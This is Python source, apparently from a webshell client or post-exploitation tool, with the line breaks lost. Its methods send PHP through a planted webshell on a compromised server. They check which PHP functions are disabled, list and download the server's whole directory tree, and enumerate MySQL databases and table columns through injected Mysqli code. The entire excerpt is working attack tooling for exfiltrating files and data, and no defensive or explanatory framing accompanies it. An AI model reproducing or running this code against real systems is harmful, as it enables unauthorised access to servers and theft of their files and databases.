def get_disabled_functions(self): if len(self.disabled_functions) != 0: Log.success("Disabled functions : \n%s" % list2string(self.disabled_functions, "\t[", "]\n")) return result = self.php_code_exec_token("echo ini_get('disable_functions');") if result[0]: if result[1] == "": Log.warning("No function disabled!") self.disabled_functions = [] else: self.disabled_functions = result[1].split(",")[0:-1] Log.success("Disabled functions : \n%s" % list2string(self.disabled_functions, "\t[", "]\n")) else: Log.error("Error occured! %s" % result[1])
def download_advanced(self, path, args): root = get_domain(self.url) # List all dir and create them directories = self.get_all_directories(path) Log.success("Directories : \n%s" % list2string(directories, "\t[", "]\n")) Log.info("Create directories locally...") for d in directories: p = root + d Log.info("Creating : [%s]" % (p)) try: os.makedirs(p) except Exception as e: Log.error(str(e)) # Download Log.info("Listing all files...") result = self.auto_exec("find %s %s" % (path, args)) if result[0]: Log.success("Listing files success!") content = result[1].split("\n")[0:-1] for file in content: p = root + file Log.info("Downloading %s to %s" % (file, p)) self.download_base(file, p) else: Log.error("Listing files error!")
def get_databases(self): if len(self.databases) != 0: Log.success("Database : \n" + list2string(self.databases, "=> [", "]\n")) return code = "error_reporting(0);$h='%s';$u='%s';$p='%s';$c=new Mysqli($h,$u,$p);$c->select_db('information_schema');$s='select schema_name from information_schema.schemata';$r=$c->query($s); while($d=$r->fetch_array(MYSQLI_NUM)){echo $d[0].',';}$c->close();" % ( self.ip, self.username, self.password) Log.info("Executing : \n%s" % code) result = self.webshell.php_code_exec_token(code) if result[0]: content = result[1] databases = content.split(",")[0:-1] self.databases = databases Log.success("Database : \n" + list2string(databases, "=> [", "]\n")) else: Log.error("Error occured!")
def get_columns_from_table(self, tablename, database): code = "error_reporting(0);$h='%s';$u='%s';$p='%s';$c=new Mysqli($h,$u,$p);$c->select_db('%s');$s='select column_name from information_schema.columns where table_name = \"%s\"';$r=$c->query($s); while($d=$r->fetch_array(MYSQLI_NUM)){echo $d[0].',';}$c->close();" % ( self.ip, self.username, self.password, database, tablename) Log.info("Executing : \n%s" % code) result = self.webshell.php_code_exec_token(code) if result[0]: content = result[1] columns = content.split(",")[0:-1] Log.success("Columns : \n" + list2string(columns, "=> [", "]\n")) else: Log.error("Error occured!")